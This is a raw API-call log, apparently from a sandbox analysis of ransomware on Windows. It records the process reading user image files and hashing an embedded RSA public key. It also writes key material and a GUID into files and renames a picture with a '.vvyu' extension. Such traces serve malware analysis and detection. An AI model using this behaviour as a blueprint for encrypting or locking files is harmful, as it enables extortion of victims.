(HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.503] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e902a0 [0201.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a0 | out: hHeap=0x620000) returned 1 [0201.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3500 [0201.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0201.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34b8 [0201.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea34a0 [0201.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0201.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0201.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0201.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0201.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.506] GetCurrentThreadId () returned 0x66c [0201.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea88f8 [0201.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.507] GetCurrentThreadId () returned 0x66c [0201.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3500 [0201.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34a0 [0201.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0201.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34b8 [0201.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3488 [0201.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3518 [0201.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0201.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34e8 [0201.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34d0 [0201.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3530 [0201.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34d0 [0201.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34e8 | out: hHeap=0x620000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0201.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34a0 [0201.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3500 | out: hHeap=0x620000) returned 1 [0201.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0201.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3530 | out: hHeap=0x620000) returned 1 [0201.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e902a0 [0201.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0201.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0201.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e904b8 [0201.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a0 | out: hHeap=0x620000) returned 1 [0201.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e904b8 | out: hHeap=0x620000) returned 1 [0201.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3518 | out: hHeap=0x620000) returned 1 [0201.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fe40 | out: hHeap=0x620000) returned 1 [0201.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.520] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6a68*, nNumberOfBytesToWrite=0x9da, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea6a68*, lpNumberOfBytesWritten=0x312fb14*=0x9da, lpOverlapped=0x0) returned 1 [0201.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.521] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x9df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.521] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.522] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.523] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.523] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.523] CloseHandle (hObject=0x510) returned 1 [0201.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0201.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0201.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0201.525] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\PFZhNu297.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\pfzhnu297.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\PFZhNu297.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\pfzhnu297.png.vvyu")) returned 1 [0201.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.528] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ca5e50 | out: hHeap=0x620000) returned 1 [0201.531] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28ebb300, ftCreationTime.dwHighDateTime=0x1d8a5c7, ftLastAccessTime.dwLowDateTime=0xcd8d1240, ftLastAccessTime.dwHighDateTime=0x1d8a726, ftLastWriteTime.dwLowDateTime=0xcd8d1240, ftLastWriteTime.dwHighDateTime=0x1d8a726, nFileSizeHigh=0x0, nFileSizeLow=0x27f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tOBMO.gif", cAlternateFileName="")) returned 1 [0201.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0201.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x2ca5e50 [0201.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0201.532] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\tOBMO.gif") returned=".gif" [0201.532] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\iIfMhH\\tOBMO.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\iifmhh\\tobmo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.532] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=10233) returned 1 [0201.532] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.536] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x27d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.536] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.538] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.538] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.538] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x27f9, lpOverlapped=0x0) returned 1 [0201.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.539] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.539] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c278) returned 1 [0201.540] CryptCreateHash (in: hProv=0x67c278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.540] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.540] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.540] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.540] GetLastError () returned 0x0 [0201.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.541] GetLastError () returned 0x0 [0201.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.541] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.541] CryptReleaseContext (hProv=0x67c278, dwFlags=0x0) returned 1 [0201.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.541] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 